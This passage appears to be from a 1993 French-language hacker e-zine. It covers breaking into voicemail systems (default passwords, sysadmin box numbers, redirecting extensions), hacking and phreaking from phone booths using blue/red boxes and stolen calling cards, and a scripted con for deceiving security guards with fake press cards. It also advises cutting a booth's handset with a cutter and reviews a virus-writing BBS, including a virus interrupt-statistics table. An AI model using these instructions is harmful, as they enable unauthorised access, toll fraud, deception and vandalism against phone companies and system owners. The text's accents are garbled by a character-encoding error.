jours. S'il n'y a toujours pas de nouveaux messages, change le
greetings (message d'annoncement) et v‚rifie de temps en temps
encore un peu. N'enregistres pas un message genre: 'Salut les boys
ici Tony The Ripper, j'ai des CCs pour vous les voici...blabla'.
Voyez le genre?. AprŠs une dizaine de jours, vous aurez une box qui
risque de durer plus longtemps que si … la premiŠre occasion vous
aviez tout chang‚ dedans. Il y a des boxes qui durent plus de 6
mois et d'autres seulement 12 heures, tout d‚pend de la patience
qu'on a...


-/- Les types de systŠmes ->

Il existe diff‚rents types de systŠmes, avec de la pratique
vous serez capable des distinguer facilement. Voici une liste des
systŠmes les plus populaires avec une brŠve description pour
chacun.

ASPEN
-----
Un des bons systŠmes contenant beaucoup d'options. Il est
facile … reconnaŒtre car la plupart du temps c'est une voix de
femme qui r‚pond: 'Hello, this is ASPEN, an automated speech
exchange network'. Pour entrer dans le systŠme de messagerie
faites: '*', vous entendrez alors: 'Please dial the number of the
person you're calling, if you have a box on this system press #'.
G‚n‚ralement les box sont de 3-4 chiffres et les mots de passe de
4-5 chiffres. Lorsque vous composez un num‚ro de box qui n'existe
pas, la premiŠre fois ‡a dit 'Mailbox XXXX is Invalid', la deuxiŠme
fois ‡a dit: 'You dialed XXXX there's no such number here' et la
troisiŠme fois ‡a raccroche. Le mot de passe par d‚faut est
g‚n‚ralement le num‚ro de la box + 0.

AUDIX
-----
Contient presque toutes les mˆmes options que les autres, mais
ce qui caract‚rise ce systŠme est l'usage de * plus une lettre pour
acc‚der aux options. Exemples: Transf‚rer d'extension *T(8), logger
dans le systŠme de messagerie *S(7), avoir de l'aide *H(4), effacer
le message *D(3) etc...

MERIDIAN MAIL
-------------
C'est un des systŠmes qui contient le plus d'options. En
g‚n‚ral, on choisi l'option voulue en appuyant sur 2 chiffres. Ce
systŠme est facile … reconnaŒtre, car la plupart du temps il
r‚pond: 'Meridian Mail, to mailbox...' et une fois la box compos‚e
il dit : 'Mailbox X-X-X-X'.

CINDY
-----
Un autre systŠme assez fr‚quent. Il r‚pond en disant: 'Good
morning, please enter the mailbox you wish to reach'. AprŠs trois
essais infructueux, le systŠme dit: 'Good morning/evening' et
raccroche. Ce qui est int‚ressant avec ce systŠme, c'est que vous
pouvez cr‚er un genre de sous-box 'invit‚', en tout 4 boxes: home,
2 guest et 1 secretary. En fait se sont d'autres mots de passe que
vous d‚finissez pour les sous-boxes, et le nombre d'options sera
restreint selon le mot de passe entr‚. Le mot de passe par d‚faut
est g‚n‚ralement 0.

Il y a aussi des QMAIL, Phone Mail, CallXpress, Genesis,
Message Center et d'autres systŠmes qui ne se nomment pas. A la
longue, vous serez capables des reconnaŒtre.


-/- Les boxes des sysadmins ->

La plupart des systŠmes contiennent une boxe qui permet de
tout contr“ler. Avec cette boxe, on peut cr‚er des boxes, changer
les diff‚rents greetings d'entr‚e, changer les options du menu
principal, d‚finir o— ‡a sonne quand on pŠse sur 0 etc... Mais ce
n'est pas toutes les boxes de sysadmin qui permettent de faire
cela, en g‚n‚ral ils peuvent seulement changer les greetings
d'entr‚e et quelques autres choses pas importantes. La meilleure
chose … faire avec une box sysadmin, est de vous cr‚er une boxe
dans un coin pas trop occup‚ du systŠme. Ou bien vous pouvez
changer o— sonnent certaines extensions, en les redirigeant vers
des num‚ros externes, style bbs et pbx.

Il y a des systŠmes qui se contr“lent seulement … partir de
PC. Parfois certaines boxes se connectent … des carrier et on peut
ainsi avoir accŠs … diverses commandes d'administration. Les boxes
de sysadmins sont g‚n‚ralement entre 9000 et 9999, le plus souvent
c'est 9999 ou 999. Les boxes qui donnent un carrier ont
g‚n‚ralement un num‚ro plus long d'un chiffre, 12345 au lieu de
1234 et ne se trouvent

  
pas assur‚ment en haut du 9000, mais plut“t
un peu partout.


-/- Exemple d'un menu de sysadmin ->

System Maintenance Function
1:Change Or Delete A system Broadcast Message
2:Record or delete a mailbox name
3:Record or delete The System Greeting
4:Record or delete logon msg
5:Record an announcement message
6:Change answer mode override
7:Change new msg into annoucement
8:Change save msg into annoucement
*: Quit system admin


-/- Conclusion ->

Une vmb c'est bien plaisant, et encore bien plus plaisant
quand t'es capable de les hacker facilement. Dans pas grand temps,
vous aurez tellement de VMBs, que vous ne saurez mˆme plus quoi en
faire. D'ici l…, continuez … espionner sur les systŠmes en ‚coutant
les messages. Mais rappelez-vous ceci: 'Jouez prudemment, moi je
peux remettre mon bras, vous pas....' -Astor



ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

A QUI APPARTIENT LE RATON QUI RONGE NOS FILS?!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



HACKER D'UNE FORTERESSE

par Blitzkreig

Plusieurs de vos messages, au cours des derniŠres semaines, ‚taient
… l'effet que le hack d'une cabine t‚l‚phonique ‚tait peut-ˆtre la
voie du futur. Oui, mais comment s'y prendre?

Les cabines t‚l‚phoniques pullulent dans le paysage de la vieille
capitale. Certains endroits, comme le Mail St-Roch, possŠdent mˆme
des cabines accessibles … toute heure du jour ou de la nuit, au
chaud, avec des bancs proches, bref, c'est quasiment comme si vous
‚tiez dans votre salon... On appelle les cabines t‚l‚phoniques
"forteresses" pour une bonne raison: rien, ou presque rien, ne peut
vous arriver lorsque vous faites du modem … partir d'une cabine
t‚l‚phonique. Le temps de r‚action des techniciens du Bell (surtout
la nuit) exclut que vous vous ramassiez avec trois voitures de
police autour de votre cabine. Contrairement aux op‚rations de
t‚l‚matique conduites depuis votre domicile, vous pouvez encore,
d'une cabine t‚l‚phonique, utiliser des stratagŠmes frauduleux
comme la boŒte rouge, la boŒte bleue, les cartes d'appel vol‚es,
bref, toute la panoplie des petits trucs qui vous sont d‚sormais
interdits de chez vous...

Ce qu'il faut retrouver dans le kit de tout bon hacker nomade...
Vous avez besoin, naturellement d'un portatif. Bon, pas besoin de
vous ruiner, l…, pas besoin d'un 486-50 pour hacker d'une cabine!
Une machine puissante, vous le savez comme moi, n'est souvent
requise que pour faire fonctionner des jeux sophistiqu‚s. Et vous
n'allez pas dans une cabine pour jouer, mais bien pour leecher,
downloader des warez, hacker des systŠmes, et courir les babs LD.
Un vieux 286 portatif est amplement suffisant, le reste, c'est du
gaspillage. C'est une bonne nouvelle parce que, en cherchant un
peu, vous allez trouver un 286 usag‚ sur le march‚ pour moins de
500 dollars.

Vous aurez aussi besoin d'un modem portatif, interne ou externe. Un
modem interne va pouvoir s'alimenter … mˆme la batterie de votre
portatif. Un modem externe, par contre, pourrait exiger que vous
ayez une source d'alimentation suppl‚mentaire (mais pas dans tous
les cas). Si vous ˆtes … l'int‚rieur d'un immeuble, pas de
problŠmes. Si par contre vous ˆtes sur le trottoir, je ne vous
conseille pas de tenter de brancher votre gear sur la batterie de
votre voiture. Vous devrez peut-ˆtre vous acheter un modem
portatif, alors ouvrez bien vos oreilles: ZyXEL, c'est la marque
que vous devez trouver. Pourquoi? Parce que, en plus de fabriquer
des V.42 bis, des V.32bis et des V.33 portatifs, les modems ZyXEL
possŠdent une caract‚ristique jusqu'… pr‚sent UNIQUE … cette
marque, un "MODE CELLULAIRE". ARQ, ASL, et tout le reste, ce genre
de protocole est la raison qui a fait de USRobotics le modem de
choix pour les amateurs de wares et de PBX de mauvaise qualit‚.
ZyXEL a d‚velopp‚ son propre protocole exclusif qui vous
permettra de faire, lorsque le temps sera venu, du phreak
cellulaire. Et ‡a s'en vient plus vite que vous ne le pensez;
alors, tant qu'… vous acheter un nouveau modem portatif, pr‚voyez-
donc pour la nouvelle technologie... Sinon, avec n'importe quel
autre marque, vous ne r‚ussirez que trŠs rarement … d‚passer le
1200 bauds … partir d'un cellulaire. Remarquez que de toutes
fa‡ons, vous allez phreaker d'une cabine t‚l‚phonique parce que vos
LD ne vous co–tent rien, alors, vous n'ˆtes peut-ˆtre pas oblig‚s
d'y aller en 14.4...

Je viens de parler de hacking … partir de cellulaire. Plusieurs
pirates am‚ricains et canadiens s'y sont d‚j… mis. Northern Phun
Co. a, je dois l'avouer quelques mois de retard sur son propre
programme de piratage de cellulaire. Mais on va s'y mettre bient“t,
vous allez voir! In‚vitablement, il va falloir abandonner nos vieux
systŠmes. La t‚l‚phonie sans fil est … nos portes. A preuve ce
petit article...



Leeched from LE JOURNAL BELL - 25 janvier 1993

Les premiers r‚seaux de t‚l‚phonie sans fil pourraient ˆtre
op‚rationnels pour la fin de 1993. Marie Caron, directrice des
communications chez Bell Mobilit‚ Cellulaire, considŠre en effet
que les premiŠres communications sans fil pourraient ˆtre ‚tablies
au Canada … la fin de 93 ou au d‚but de 94.
Fin d‚cembre, un pas important ‚tait d'ailleurs franchi dans
cette direction. Le ministre des Communications du Canada, Perrin
Betty, d‚livrait alors quatre licences … autant de compagnies les
autorisant … offrir un service t‚l‚phonique public sans fil sur
l'ensemble du territoire canadien.
Pas plus gros qu'une calculatrice, le t‚l‚phone sans fil se
glissera dans la poche ou dans le sac … main. Il fonctionnera
partout o— seront install‚es des bases sp‚ciales. Une fois le
r‚seau mis en place, les usagers pourront faire ou recevoir des
appels au bureau aussi bien qu'… la maison, au restaurant ou au
centre commercial.
Bell Canada, qui est engag‚e activement dans la recherche sur
la t‚l‚phonie sans fil depuis 1990, assiste avec enthousiasme …
l'implantation de cette technologie. La compagnie continuera d'en
appuyer le d‚veloppement, notamment en offrant l'accŠs au r‚seau
t‚l‚phonique public.

LES QUATRE COMPAGNIES RETENUES

Sept entreprises ‚taient en lice pour la prestation des
service de t‚l‚phonie sans fil. Le ministŠre des Communications a
d‚cid‚ d'accorder des licences … quatre d'entre elles. Ce sont:
--Canada Popfone Corp.,un consortium d'entreprises de
communications sous la direction de Call-Net Entreprises Ltd.,
--Mobility Personacom Ltd., un consortium des filiales des
partenaires de Stentor sp‚cialis‚es dans la t‚l‚phonie cellulaire,
--Rogers Cantel Mobile Inc., une soci‚t‚ de t‚l‚phonie cellulaire
de Toronto,
--Telezone, un consortium national regroupant surtout des
entreprises qui offrent des services de recherche de personne.

- 30 -


C'est Bell lui-mˆme qui nous presse de modifier nos habitudes de
piratage! Et comme nous ‚coutons toujours le Bell...

Mais on n'est pas encore dans les cellulaires cette semaine... Nous
sommes dans les cabines t‚l‚phoniques, nous avons le portatif, le
modem, et... mais o— branche-t'on ce maudit modem?
Ha ha! Vous cherchez un jack (RJ-11) et vous n'en trouvez pas!
C'est donc mal pens‚, ces cabines-l…! En effet, … part dans les
a‚roports, vous ne rencontrerez que trŠs rarement des cabines avec
des prises de t‚l‚phone vous permettant de brancher votre modem. Il
faut donc faire appel … un coupleur acoustique. Un coupleur, c'est
un espŠce de handset qui va relier l'acoustique du t‚l‚phone de la
cabine … votre modem. Radio-Schack en a parfois, sinon faites
marcher vos doigts et ‚cumez les pages jaunes dans les rubriques
"lectronique" et "T‚l‚phonie". Vous pouvez encore appeler chez
Addison, … Montr‚al, et vous faire envoyer le catalogue. Vous
trouverez des coupleurs acoustiques dans la section Industrielle...
Le num‚ro de Addison est 514-376-1740. Sinon, il y a cette
compagnie am‚ricaine, Unlimited Systems Corp., de San Diego, qui
vend un kit complet de voyage (Coupleur Konexx ModŠle 203, adapteur
t‚l‚phonique Merlin, batterie 9 volts, etc) pour 169 $US. Commandez
au 1-800-275-6354.

JE SUIS CASS, MAIS JE SUIS QUIP! QUE DOIS-JE FAIRE?

Je d‚bute, mais j'ai du beat!
Quelques petits conseils pour les hackers nomades. Il y a fort …
parier que si vous choisissez de fr‚quenter les endroits publics en
fin de soir‚e, un agent de s‚curit‚ plus curieux que les autres va
vous demander ce que vous faites avec un ordi branch‚ sur le
t‚l‚phone. Encore une fois, ce genre de rencontre est moins
embarrassant au Mail St-Roch, parce que l'int‚rieur du Mail est
public, contrairement … la plupart des centres d'achats (les gens
de 2600 D.C. en savent quelque chose...). Il y a des gens qui
VIVENT dans des appartements, des chambres plut“t, qui donnent sur
le mail. Vous pouvez de plus vous mˆler … la foule des poivrots qui
hante ces lieux. Les agents sont beaucoup plus cools. Ceci dit,
vous pouvez toujours les bullshitter. Un truc que j'utilise, c'est
celui du journaliste de passage … Qu‚bec. Voici comment proc‚der:
1) Achetez-vous une revue parlant de voyage dans un kiosque: Cond‚
Nast a de belles photos...
2) Trouvez-vous une machine … fabriquer des cartes d'affaires
automatique. Il y en a une … Place Qu‚bec, juste au dessus des
anciens cin‚mas.
3) Trouvez-vous un nom plausible et totalement inconnu parmi les
collaborateurs de la revue. Faites-vous quatre ou cinq cartes avec
ce nom, et rajoutez des d‚tails comme des num‚ros de t‚l‚phone dans
le 416 ou le 613, un num‚ro de fax, la mention "REPORTER FOR HIRE"
sous le nom, ce qui vous chante quoi.

Vous voil… arm‚ pour toute s‚ance de social engineering qui
pourrait se pr‚senter. Ca pourrait ressembler … ca...

Je suis en train de fumer une cigarette, appuy‚ contre le
t‚l‚phone, en attendant que le d/l se termine. Le couvercle de mon
portatif est quasiment referm‚, histoire qu'un ‚ventuel emmerdeur
ne voit pas ce qui s'y passe. Un agent de s‚curit‚ s'aproche pour
faire un brin de jasette.

Agent - "Que faites-vous l…?"

Vous - "J'envoie un papier … la salle de r‚daction."

Agent - "Vous faites quoi?"

Vous sortez de maniŠre tout … fait d‚bonnaire une carte de votre
poche de chemise - "Peter Zwygboski, collaborateur occasionnel … la
revue Cond‚ Nast."
Vous sortez le dernier num‚ro de la poche de
votre veston, et lui tendez. "Connaissez-vous cette revue?"

Agent - "Non, jamais entendu parler" (Ne soyez pas d‚mont‚s, il est
bien connu que ces gens ne savent pas lire...)

Vous - "Regardez … la page 83, il y a un article de moi sur les
torrides tortues du Totuba Tabo..."
(Ca aiderait que vous ayez jet‚
un coup d'oeil … l'article en question, et que vous lui r‚pondiez
dans un fran‡ais cass‚)

Agent - (AprŠs avoir regard‚ l'article) "Ca m'explique toujours pas
ce que vous faites l…"
.

Vous - "Vous connaissez les technologies modernes, je suppose.
J'envoie par ordinateur mon texte sur Qu‚bec au bureau de New-York
pour le prochain num‚ro."


Agent - (Il a vraiment du temps … perdre, ce con) "Pourquoi vous
faites pas ‡a de votre chambre d'h“tel?"


Vous - "Je n'ai pas de chambre justement. Je suis stationn‚ dans
la rue, et je prends quelques minutes pour envoyer mon texte. Je
dois continuer sur Charlevoix cette nuit, parce qu'on m'a demand‚
de faire un papier sur cette r‚gion … la lumiŠre de l'implantation
prochaine des casinos."


G‚n‚ralement, l'agent tourne les talons … ce moment l…... Courez
aprŠs pour r‚cup‚rer votre revue, avec un grand sourire!

Variantes: vous mesurez 4'6", et n'avez manifestement pas plus de
16 ans: vous ˆtes un ‚tudiant d'une ‚cole de Montr‚al venu faire un
papier pour le journal de l'association sur la course … l'exploit
telle qu'elle se pratique … Qu‚bec. Vous aurez pris une cabine pas
loin d'un h“tel, et vous oublierez l'histoire des cartes
d'affaires.
Ou vous avez moins de trente ans, mais ne paraissez pas ˆtre un
coll‚gien. Changez la revue pour un mag sur le skateboard, et
travaillez sur une explication de circonstance...

Quoiqu'il arrive, l'agent de s‚curit‚, au pire (VRAIMENT AU PIRE!)
ne peut que vous demander de quitter les lieux. Vous remballez
tranquillement votre stuff.

Une autre maniŠre de ne pas ˆtre emmerd‚, pour ceux qui ne seraient
pas tent‚s par le social engineering. Allez dans une cabine
ext‚rieure avec un cutter et sectionnez l'acoustique au ras de la
boŒte. D‚guerpissez... Lorsque vous serez … la cabine d'o— vous
voulez placer votre appel, ploguez tout votre stock, d‚posez le sur
la tablette, et lorsque votre d/l est parti, recouvrez le tout avec
un manteau. Si quelqu'un s'amŠne, plantez-vous devant la cabine et
faites semblant de parler dans L'AUTRE acoustique, celle qui ne
sert … rien, celle que vous avez chapard‚e. Ils n'y verront que du
feu... garanti....

Un dernier truc: ne retournez jamais deux fois dans la mˆme cabine.
Ce serait courir un risque inutile au cas, fort improbable, o— des
agents du Bell seraient post‚s, dans l'espoir que le fraudeur
revienne. Avec un gros marqueur au crayon feutre, un marqueur
INDLBILE, faites une marque sur la cabine d'o— vous venez de
pirater, avec la date, de maniŠre … ce qu'un autre pirate qui
passerait par l… quelques jours plus tard sache que cette cabine
est peut-ˆtre surveill‚e. crivez un gros "
NPC" sur la fenˆtre de
plexi sur le c“t‚ de la cabine. C'est un signe de reconnaissance
qui en vaut bien un autre...

Et dites: MERCI NPC!



ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

ON VEUT VOTRE BIEN, ET ON VA L'AVOIR!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



CHRIE, BARRE LES PORTES, ON SORT...

Visite d'un co0l board: Cybernetic Violence

par
Santa Claus


Greets: Pure Energy (Autorisation)


Salut les mecs, content de vous revoir.

Fin de la formule de politesse.
Pour ce num‚ro, soit dit en passant, exceptionnel,
c'est le Cybernetic Violence qui va passer au broyeur. Ce
board est exclusivement H/P/C/A/V et a d‚j… sa r‚putation de
faite.

Histoire de voir un peu de pays, on va suivre la recette
originelle... On ne brise pas une combinaison gagnante... Et pas de
"
J'en ai rien … foutre de c'te place l…!", C'est quand mˆme de
notre chŠre patrie dont on parle ici. Pas seulement de notre
patrie le cyberspace, mais c'est un board qu‚b‚cois... Et puis il
est, disons, "
sup‚rieur … beaucoup d'autres", pour ne pas outrer
personne avec un autre terme qui pourrait ne pas convenir...
(Elite...)
Mais faut croire que la qualit‚ des boards en g‚n‚ral a baiss‚
depuis la fermeture du d‚funt Blitzkrieg... Et si par pur hasard le
NPC-004 tombait entre les mains de l'ex-sysop de Blitzkrieg BBS,
priŠre de nous contacter... Nous sommes en deuil... (Un peu de
tenue, c'est quand mˆme la fin du monde...)
Je disais donc? Ah! Oui... Le Cybernetic: histoire de ne pas
perdre de temps, on va commencer... Faudrait pas que
j'empiŠte sur les plates-bandes des autres... Allez!



Welcome to Cybernetic Violence - NuKE/NuKENet WHQ - (1:950/0),
NuKE / NuKENet World HeadQuarters
SysOp: Pure Energy
Co-SysOp: Rock Steady

- Running With a 16.8 K HST
- H/P/C/A/V Only
- NuKE Member board
- NuKeNeT Whq
- InterNet/Usenet Node (Virus.Comp)



Cybernetic Violence est le World HeadQuarter de NuKE, un groupe
principalement ax‚ sur les virii. Pour vous situer un peu, les deux
leaders, ma foi, incontest‚s, du monde des virii sont NukE et
Phalcon/Skism. Au go–t de Blitz, cependant, rien n'approche la
qualit‚ des messageries du NuKENeT, toujours en ce qui concerne les
virii. Et on va vous en faire la preuve. NuKENeT est un des nets
underground les plus recherch‚s par les babs dignes de ce nom. Il
se r‚pand partout en Europe (avec des nodes officielles en Suisse,
notamment) et en Australie (mate!).

Voici d,ailleurs certaines de nodes officielles de NukE...

NuKE-NeT

BBS Name ÃÙÀ ´ Number ÃÙÀ´ Location ÃÙ À´ SysOp ÃÙÀ´ Node

Cybernetic Violence 514-385-XXXX Montreal Pure Energy 1:950/0
Disintegration Zone 514-PRI-VATE Montreal Rock Steady 1:950/1
The Hell Pit 708-459-XXXX Illinois Kato & Hades1:950/2
Total Mayhem +61-3-PRIVATE Australia Phrozen Doberman
1:950/3
The Pit +61-3-742XXXX Australia Greyswandir 1:950/4
Brain Damage 819-778-XXXX Hull Dark Angel 01:950/5
PhunLine ][ +46-8-716XXXX Sweden Ford Fairlane
1:950/6
Land of Silence 418-687-XXXX Quebec City CoaxialKarma1:950/7
Enigma E:N:U:N +41-22-340XXXX Switzerland Savage Beast1:950/8
Demoralized City +46-31-91XXXX Sweden Tormentor 1:950/9
Power House BBS 416-692-XXXX Toronto Thunder 1:950/10

NuKE compte parmi ses rangs des noms aussi prestigieux que Rock
Steady ou le fameux Nowhere Man, le cr‚ateur du d‚sormais c‚lŠbre
VCL.

DISTRIBUTION DES MESSAGERIES

General Topics [NuKENeT]
Anti-Viral Talk [NuKENeT]
ASM Programming [NuKENeT]
Unix Systems [NuKENeT]
Phreaking Away [NuKENeT]
System Entry [NuKENeT]
NuKE/SCP Public [NuKENeT]
Comp.Virus (Internet)[NuKENeT]
Alt.Security [NuKENeT]


On va tout d'abord visiter la messagerie la plus pˆt‚e de toutes,
Anti-Viral Talk. C'est pas compliqu‚, pour le commun des mortels,
ce type de discussion ressemble … du serbo-croate...


Msg #: [104/121] Base: Anti-Viral Talk [NuKENeT]
Date : 17 Jan 93 19:26:34 Stat: Sent
From : Arthur Ellis
To : All
Title: Virus Statistics

I have not seen any good statistical analyses of viruses, with the
exception of the various MtE tests. So here is a beginning. A
program called CHKINT was used to detect possible interrupts by
scanning for CDh opcodes. This is an approximate measure only.
Frequency of Interrupts in a sample of 908 different .COM type
viruses, sampled using CHKINT.EXE.

Freq int fn | Freq int fn | Freq int fn | Freq int fn

----------------|---------------|---------------|---------------

24 00h 01h | 3 00h 02h | 6 00h 03h | 2 00h 04h
2 00h 05h | 1 00h 06h | 1 00h 44h | 28 01h 01h
4 01h 02h | 1 01h 04h | 1 01h 06h | 1 01h 17h
15 02h 01h | 3 02h 02h | 2 02h 03h | 1 02h 06h
10 03h 01h | 2 03h 02h | 1 03h 03h | 1 03h 05h
1 03h 07h | 14 04h 01h | 1 04h 02h | 2 04h 03h
1 04h 07h | 10 05h 01h | 4 05h 02h | 1 05h 03h
3 05h 04h | 13 06h 01h | 5 06h 02h | 11 07h 01h
5 07h 02h | 1 07h 23h | 1 07h FAh | 7 08h 01h
5 08h 02h | 1 08h 12h | 7 09h 01h | 4 09h 02h
7 0Ah 01h | 1 0Ah 02h | 7 0Bh 01h | 1 0Bh 02h
1 0Bh 03h | 2 0Bh 04h | 3 0Bh 07h | 5 0Ch 01h
7 0Dh 01h | 1 0Dh 03h | 1 0Dh 06h | 9 0Eh 01h
1 0Eh 02h | 7 0Fh 01h | 1 0Fh 03h |125 10h 01h
25 10h 02h | 37 10h 03h | 8 10h 04h | 5 10h 05h
11 10h 06h | 6 10h 07h | 3 10h 08h | 5 10h 09h
4 10h 0Ah | 1 10h 0Bh | 3 10h 0Ch | 1 10h 0Dh
1 10h 0Eh | 2 10h 0Fh | 1 10h 10h | 2 10h 12h
2 10h 14h | 3 10h 15h | 1 10h 1Eh | 8 11h 01h
3 11h 02h | 2 11h 05h | 16 12h 01h | 2 12h 02h
1 12h 03h | 79 13h 01h | 31 13h 02h | 15 13h 03h
15 13h 04h | 11 13h 05h | 10 13h 06h | 1 13h 07h
4 13h 08h | 5 13h 09h | 6 13h 0Ah | 1 13h 0Bh
1 13h 0Ch | 4 14h 01h | 2 14h 02h | 1 14h 03h
1 14h 04h | 1 14h 05h | 11 15h 01h | 6 15h 02h
2 15h 03h | 1 15h 04h | 1 15h 06h | 1 15h 1Bh
34 16h 01h | 28 16h 02h | 3 16h 03h | 4 16h 04h
2 16h 05h | 2 16h 06h | 1 16h 0Ah | 9 17h 01h
2 17h 02h | 1 17h 03h | 4 18h 01h | 2 18h 02h
30 19h 01h | 7 19h 02h | 55 1Ah 01h | 14 1Ah 02h
16 1Ah 03h | 1 1Ah 04h | 1 1Ah 06h | 4 1Bh 01h
1 1Bh 02h | 1 1Bh 03h | 6 1Ch 01h | 4 1Ch 02h
3 1Ch 03h | 4 1Dh 01h | 1 1Dh 02h | 1 1Dh 04h
1 1Dh 06h | 3 1Eh 01h | 3 1Eh 02h | 2 1Fh 01h
1 1Fh 02h | 1 1Fh 03h | 1 1Fh 44h |351 20h 01h
75 20h 02h | 14 20h 03h | 15 20h 04h | 3 20h 05h
1 20h 09h | 87 21h 01h | 44 21h 02h | 17 21h 03h
18 21h 04h | 16 21h 05h | 20 21h 06h | 14 21h 07h
21 21h 08h | 29 21h 09h | 41 21h 0Ah | 17 21h 0Bh
24 21h 0Ch | 18 21h 0Dh | 15 21h 0Eh | 28 21h 0Fh
14 21h 10h | 24 21h 11h | 25 21h 12h | 14 21h 13h
33 21h 14h | 19 21h 15h | 23 21h 16h | 21 21h 17h
21 21h 18h | 16 21h 19h | 5 21h 1Ah | 6 21h 1Bh
10 21h 1Ch | 12 21h 1Dh | 5 21h 1Eh | 5 21h 1Fh
2 21h 20h | 5 21h 21h | 3 21h 22h | 8 21h 23h
6 21h 24h | 7 21h 25h | 8 21h 26h | 4 21h 27h
6 21h 28h | 3 21h 29h | 2 21h 2Ah | 5 21h 2Bh
4 21h 2Ch | 9 21h 2Dh | 25 21h 2Eh | 10 21h 2Fh
5 21h 30h | 2 21h 31h | 1 21h 32h | 5 21h 33h
1 21h 37h | 1 21h 38h | 1 21h 39h | 1 21h 3Ah
4 21h 3Bh | 2 21h 3Ch | 1 21h 3Eh | 1 21h 40h
1 21h 42h | 1 21h 44h | 1 21h 47h | 1 21h 48h
1 21h 49h | 1 21h 4Dh | 1 21h 4Eh | 1 21h 54h
2 21h 57h | 1 21h 59h | 2 21h 5Ch | 1 21h 64h
1 21h 65h | 1 21h 67h | 1 21h 79h | 1 21h 7Ch
1 21h 84h | 1 21h 8Bh | 3 21h F0h | 3 22h 01h
6 23h 01h | 1 23h 02h | 11 24h 01h | 1 24h 0Ah
18 25h 01h | 7 25h 02h | 3 25h 03h | 1 25h 04h
74 26h 01h | 18 26h 02h | 1 26h 03h | 2 26h 04h
3 26h 05h | 1 26h 0Ch | 33 27h 01h | 1 27h 02h
5 28h 01h | 2 28h 02h | 7 29h 01h | 7 2Ah 01h
3 2Ah 03h | 13 2Bh 01h | 1 2Bh 06h | 8 2Ch 01h
13 2Dh 01h | 1 2Dh 02h | 18 2Eh 01h | 11 2Fh 01h
19 2Fh 02h | 9 2Fh 03h | 16 2Fh 04h | 4 2Fh 06h
2 2Fh 08h | 1 2Fh 09h | 1 2Fh 0Ch | 1 2Fh 1Ah
1 2Fh 20h | 1 2Fh 2Ah | 5 30h 01h | 1 30h 34h
1 30h 38h | 1 31h 01h | 1 31h 03h | 6 32h 01h
1 32h 03h | 2 32h 06h | 5 32h 07h | 2 32h 1Ah
19 33h 01h | 1 33h 04h | 4 34h 01h | 5 35h 01h
1 35h 06h | 1 35h 08h | 7 36h 01h | 5 37h 01h
3 37h 03h | 1 37h 09h | 3 38h 01h | 5 39h 01h
1 39h 12h | 11 3Ah 01h | 1 3Ah 03h | 10 3Bh 01h
1 3Bh 05h | 1 3Bh 07h | 6 3Ch 01h | 6 3Dh 01h
1 3Dh 0Dh | 1 3Eh 01h | 1 3Eh 02h | 3 3Eh 03h
7 3Fh 01h | 37 40h 01h | 2 40h 02h | 1 40h 03h
1 41h 02h | 5 42h 01h | 1 43h 01h | 1 43h 02h
3 44h 01h | 1 44h 02h | 7 45h 01h | 1 45h 02h
2 45h 03h | 9 46h 01h | 6 47h 01h | 1 47h 02h
3 48h 01h | 1 48h 02h | 6 49h 01h | 5 4Ah 01h
3 4Bh 01h | 1 4Bh 03h | 1 4Ch 05h | 6 4Dh 01h
1 4Dh 03h | 7 4Eh 01h | 8 4Fh 01h | 1 4Fh 02h
1 4Fh 16h | 10 50h 01h | 2 50h 05h | 1 50h 36h
